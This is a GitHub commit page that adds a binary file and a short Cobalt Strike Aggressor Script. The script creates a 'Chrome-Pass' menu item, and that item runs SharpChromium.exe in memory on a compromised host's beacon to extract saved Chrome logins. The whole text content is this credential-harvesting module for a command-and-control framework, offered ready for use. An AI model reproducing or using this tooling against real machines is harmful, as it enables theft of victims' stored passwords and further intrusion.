Add files via upload

This commit is contained in:
TimWhite
2020-04-22 16:37:33 +08:00
committed by GitHub
parent adbefc73eb
commit 43eb007ba9
2 changed files with 8 additions and 0 deletions
Binary file not shown.
+8
View File
@@ -0,0 +1,8 @@
sub chrome_password{
bexecute_assembly($bid, script_resource("modules/SharpChromium.exe"), "logins");
}
item "Chrome-Pass"{
$bid = $1['@'];
chrome_password($bid);
}